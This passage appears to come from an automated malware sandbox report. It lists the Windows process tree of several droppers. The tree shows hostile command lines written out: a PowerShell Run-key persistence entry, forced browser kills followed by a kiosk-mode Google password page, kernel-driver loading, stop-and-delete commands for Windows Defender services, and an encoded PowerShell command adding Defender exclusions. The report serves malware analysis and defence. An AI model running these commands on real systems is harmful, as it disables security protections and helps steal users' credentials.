        PID:6464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        15⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        16⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        17⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        18⤵
        
        PID:6588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        19⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        20⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        21⤵
        
        PID:10592
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        22⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        23⤵
        
        PID:12564
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        24⤵
        
        PID:6852
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        25⤵
        
        PID:6792
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        26⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        27⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        28⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        29⤵
        
        PID:12676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        30⤵
        
        PID:7180
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        31⤵
        
        PID:7104
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        32⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        33⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        34⤵
        
        PID:8460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        35⤵
        
        PID:12824
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        36⤵
        
        PID:744
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        37⤵
        
        PID:5224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        38⤵
        
        PID:9496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        39⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        40⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        41⤵
        
        PID:7432
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        42⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        43⤵
        
        PID:8616
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        44⤵
        
        PID:8464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        45⤵
        
        PID:8288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservicew.exe"
        46⤵
        Modifies registry key
        
        PID:8984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservicew.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe\"'"
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9412
- - C:\Users\Admin\AppData\Local\Temp\10475100101\3a4ce44f90.exe
    "C:\Users\Admin\AppData\Local\Temp\10475100101\3a4ce44f90.exe"
    3⤵
    PID:3684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:11324
- - C:\Users\Admin\AppData\Local\Temp\10475110101\042044a70a.exe
    "C:\Users\Admin\AppData\Local\Temp\10475110101\042044a70a.exe"
    3⤵
    PID:7196
- - C:\Users\Admin\AppData\Local\Temp\10475120101\0a96e5c12c.exe
    "C:\Users\Admin\AppData\Local\Temp\10475120101\0a96e5c12c.exe"
    3⤵
    PID:12908
- - C:\Users\Admin\AppData\Local\Temp\10475130101\de1a6ef365.exe
    "C:\Users\Admin\AppData\Local\Temp\10475130101\de1a6ef365.exe"
    3⤵
    PID:8228
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:11504
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:5316
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:6896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:7024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:5656
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2592
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:12492
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {aabff4ad-41e7-4beb-a6b1-79eb5389c836} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:7508
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2388 -initialChannelId {f4e499f1-7156-41aa-91a4-0b59c9c1bc5b} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:9240
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3868 -prefsLen 25213 -prefMapHandle 3872 -prefMapSize 270279 -jsInitHandle 3876 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3884 -initialChannelId {bf207973-3b90-440b-a149-f35c5c20c0c7} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        
        PID:9648
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4108 -prefsLen 27325 -prefMapHandle 4112 -prefMapSize 270279 -ipcHandle 4124 -initialChannelId {1f8f3446-9bc4-4946-8049-a2169b8361bb} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:11356
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4440 -prefsLen 34824 -prefMapHandle 4444 -prefMapSize 270279 -jsInitHandle 4460 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4468 -initialChannelId {0bc6e909-85de-436b-ad85-26a9f678c116} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        
        PID:10576
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5112 -prefsLen 35012 -prefMapHandle 5116 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {f2f73967-2041-49ad-9e7c-4f22f6607738} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        
        PID:12776
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5244 -prefsLen 32952 -prefMapHandle 5248 -prefMapSize 270279 -jsInitHandle 5252 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5260 -initialChannelId {b7e6ac76-fda2-4660-b854-ab35ccfec566} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        
        PID:12900
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5504 -prefsLen 32952 -prefMapHandle 5508 -prefMapSize 270279 -jsInitHandle 5512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5520 -initialChannelId {dd0f9b82-7399-4d46-9e97-0dc3d542d6c4} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        
        PID:12740
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32952 -prefMapHandle 5760 -prefMapSize 270279 -jsInitHandle 5764 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5740 -initialChannelId {9ec16034-7334-419d-8080-28001645b660} -parentPid 12492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.12492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        
        PID:2836
- - C:\Users\Admin\AppData\Local\Temp\10475140101\10c738294f.exe
    "C:\Users\Admin\AppData\Local\Temp\10475140101\10c738294f.exe"
    3⤵
    PID:8640
  - - C:\Users\Admin\AppData\Local\Temp\272.exe
      "C:\Users\Admin\AppData\Local\Temp\272.exe"
      4⤵
      PID:6320
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F2B.tmp\6F2C.tmp\6F2D.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
        5⤵
        
        PID:8248
      - C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe" go
        6⤵
        
        PID:5272
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\710F.tmp\7110.tmp\7111.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
        7⤵
        
        PID:4468
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:10216
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:10536
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:12476
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:1720
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:1584
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2240
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7172
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:5144
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:6840
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:8360
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:5380
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:9852
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:11392
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:11096
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:3332
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:2572
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:10256
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:10428
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:10280
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:8728
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:6936
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        
        PID:12940
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:5664
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:9776
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:1340
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:10692
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:11984
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:12232
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:11632
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:10776
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:10872
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:10892
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:10712
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:11372
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:12372
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:6456
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:11456
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:12204
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:12172
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:12304
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:11724
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:11864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:6020
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:5888
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:4464
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:7232
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:7256
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:7824
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:9660
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:10460
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:2872
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:6356
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:7732
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:6512
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:7608
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:2184
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:5136
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:9744
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:6568
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:9516
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:11692
- - C:\Users\Admin\AppData\Local\Temp\10475150101\9fcf00e455.exe
    "C:\Users\Admin\AppData\Local\Temp\10475150101\9fcf00e455.exe"
    3⤵
    PID:10916
- - C:\Users\Admin\AppData\Local\Temp\10475160101\8c0efc31eb.exe
    "C:\Users\Admin\AppData\Local\Temp\10475160101\8c0efc31eb.exe"
    3⤵
    PID:13152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:3680

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6764

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:6032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBtAFAAcAByAEUAZgBFAFIAZQBOAGMAZQAgAC0AZQBYAGMAbABVAFMAaQBvAG4AcABhAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0AZgBPAHIAQwBFADsAIABBAGQAZAAtAE0AcABQAHIARQBGAGUAcgBlAG4AQwBlACAALQBFAFgAQwBMAFUAUwBJAE8AbgBQAHIAbwBDAEUAUwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBmAE8AcgBDAEUA
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{9e194119-9550-4fff-90bb-3aae40e28fb8}\57ca6c8a-5811-4179-92e8-6c241018de9e.cmd"0
1⤵
PID:6576

C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6032
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  PID:12932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7844 -ip 7844
1⤵
PID:2008

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:11436

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:12524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe"
1⤵
PID:5256
- C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
  2⤵
  PID:9168
- - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    3⤵
    PID:9044
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
      4⤵
      PID:9312
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        5⤵
        
        PID:9504
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        6⤵
        
        PID:9728
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        7⤵
        
        PID:11380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        8⤵
        
        PID:10912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        9⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        10⤵
        
        PID:10308
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        11⤵
        
        PID:10556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        12⤵
        
        PID:10644
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        13⤵
        
        PID:10724
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        14⤵
        
        PID:10884
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        15⤵
        
        PID:11052
        
